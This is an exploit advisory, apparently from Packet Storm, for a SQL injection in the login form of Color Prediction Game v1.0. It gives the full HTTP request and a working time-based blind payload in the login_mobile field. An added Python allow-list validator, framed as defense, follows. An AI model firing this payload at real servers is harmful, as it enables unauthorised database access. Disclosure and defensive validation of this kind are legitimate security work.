Color Prediction Game 1.0 SQL Injection

Color Prediction Game version 1.0 suffers from a remote SQL injection vulnerability.

Packet Storm
# Exploit Title: Color Prediction Game v1.0 - SQL Injection
# Date: 2023-08-12
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://www.codester.com/items/44411/color-prediction-game-php-script
# Tested on: Kali Linux & MacOS
# CVE: N/A

### Request ###

POST /loginNow.php HTTP/1.1
Host: localhost
Cookie: PHPSESSID=250594265b833a4d3a7adf6e1c136fe2
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: */*
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------395879129218961020344050490865
Content-Length: 434
Origin: http://localhost
Referer: http://localhost/login.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

-----------------------------395879129218961020344050490865
Content-Disposition: form-data; name="login_mobile"

4334343433
-----------------------------395879129218961020344050490865
Content-Disposition: form-data; name="login_password"

123456
-----------------------------395879129218961020344050490865
Content-Disposition: form-data; name="action"

login
-----------------------------395879129218961020344050490865--

### Parameter & Payloads ###

Parameter: MULTIPART login_mobile ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload:
-----------------------------395879129218961020344050490865
Content-Disposition: form-data; name="login_mobile"

4334343433' AND (SELECT 4472 FROM (SELECT(SLEEP(5)))UADa) AND 'PDLW'='PDLW
-----------------------------395879129218961020344050490865
Content-Disposition: form-data; name="login_password"

123456
-----------------------------395879129218961020344050490865
Content-Disposition: form-data; name="action"

login
-----------------------------395879129218961020344050490865--
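
A server-side allow-list check on the three multipart fields shown in the request above, as an added example (not code from the advisory or the vendor). It assumes a mobile number is 6 to 15 ASCII digits and uses a constructed boundary and sample bodies; it is a second layer in front of the real fix, which is binding `login_mobile` as a parameter in a prepared statement.

```python
import re
from email.parser import BytesParser

# Assumption: mobile numbers are 6-15 ASCII digits (the page shows a 10-digit value).
MOBILE_RE = re.compile(r"[0-9]{6,15}")
BOUNDARY = "constructed-boundary-395879"  # constructed, not the captured one
CONTENT_TYPE = "multipart/form-data; boundary=" + BOUNDARY
EXPECTED = ("login_mobile", "login_password", "action")

def parse_multipart(content_type, body):
    """Return {field name: [values]} for a multipart/form-data body."""
    raw = b"Content-Type: " + content_type.encode("ascii") + b"\r\n\r\n" + body
    msg = BytesParser().parsebytes(raw)
    fields = {}
    if not msg.is_multipart():  # missing or wrong boundary: nothing is trusted
        return fields
    for part in msg.get_payload():
        name = part.get_param("name", header="content-disposition")
        if not isinstance(name, str):
            continue
        data = part.get_payload(decode=True) or b""
        fields.setdefault(name, []).append(data.decode("utf-8", "replace"))
    return fields

def validate_login(fields):
    """Return a list of rejection reasons; empty means the form may proceed."""
    errors = [f"{n}: expected exactly one value" for n in EXPECTED
              if len(fields.get(n, [])) != 1]  # also rejects duplicated fields
    if errors:
        return errors
    if not MOBILE_RE.fullmatch(fields["login_mobile"][0]):
        errors.append("login_mobile: not a plain digit string")
    if fields["action"][0] != "login":
        errors.append("action: unexpected value")
    return errors

def build_body(mobile, extra=()):
    """Constructed sample body with the three fields from the request above."""
    parts = [("login_mobile", mobile), ("login_password", "123456"),
             ("action", "login"), *extra]
    chunks = [f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="{n}"\r\n\r\n{v}\r\n'
              for n, v in parts]
    return ("".join(chunks) + f"--{BOUNDARY}--\r\n").encode()

if __name__ == "__main__":
    for mobile in ("4334343433", "4334343433' AND 'PDLW'='PDLW"):
        fields = parse_multipart(CONTENT_TYPE, build_body(mobile))
        print(repr(mobile), validate_login(fields))
```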
